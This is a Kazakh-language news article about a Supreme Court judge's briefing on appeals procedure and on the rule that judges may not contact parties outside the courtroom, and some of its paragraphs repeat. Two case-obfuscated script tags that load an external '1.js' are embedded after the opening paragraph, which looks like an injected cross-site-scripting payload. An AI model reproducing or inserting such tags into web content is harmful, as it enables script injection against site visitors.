ҚР Жоғарғы Сотының азаматтық істер жөніндегі сот алқасының төрағасы Нұрсерік Шәріпов Орталық коммуникациялар қызметінде өткен брифингте сот актілеріне шағымданудың процессуалдық тәртібі және соттарда азаматтарды қабылдау мәселелері туралы айтып берді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
18.04.2022
Судьяларға сот отырысы залынан тыс тараптармен байланыс жасауға қатаң тыйым салынады
ҚР Жоғарғы Сотының азаматтық істер жөніндегі сот алқасының төрағасы Нұрсерік Шәріпов Орталық коммуникациялар қызметінде өткен брифингте сот актілеріне шағымданудың процессуалдық тәртібі және соттарда азаматтарды қабылдау мәселелері туралы айтып берді.
«Заң бойынша судья істерді оның қызметіне қандай да бір араласуды болдырмайтын жағдайларда қарайды. Судьяларға сот отырысы залынан тыс тараптармен байланыс жасауға қатаң тыйым салынады. Кез келген басқа байланыстар процессуалдық емес деп танылады. Бұл үшін жауапкершілік қарастырылған. Судьяларды сот жюриінде жазалаудың көптеген фактілері бар. Сот жюриі Жоғары Сот Кеңесінің жанында жұмыс істейді, Мемлекет басшысының өкілеттіктерін іске асыратын дербес орган болып табылады. Тікелей қарым-қатынас, оның үстіне Сот жюриінің Жоғарғы Сотқа бағынуы жоқ», - деп атап өтті ҚК судьясы.
Істерді, шағымдарды, өтінішхаттарды, наразылықтарды қарау тәртібі процестік кодекстерде нақты белгіленген. Егер адам кассациялық сатының шешімімен келіспесе, онда оның тағы екі жолы бар: наразылық енгізу үшін Бас прокурорға жүгіну; немесе кассациялық сатыда қайта қарауға ұсыныс енгізу туралы Жоғарғы Соттың Төрағасына жүгіну. Сот актілерін қайта қараудың басқа нұсқалары жоқ.
Заң бойынша судья істерді оның қызметіне қандай да бір араласуды болдырмайтын жағдайларда қарайды. Судьяларға сот отырысы залынан тыс тараптармен байланыс жасауға қатаң тыйым салынады. Кез келген басқа байланыстар процессуалдық емес деп танылады. Бұл үшін жауапкершілік қарастырылған.

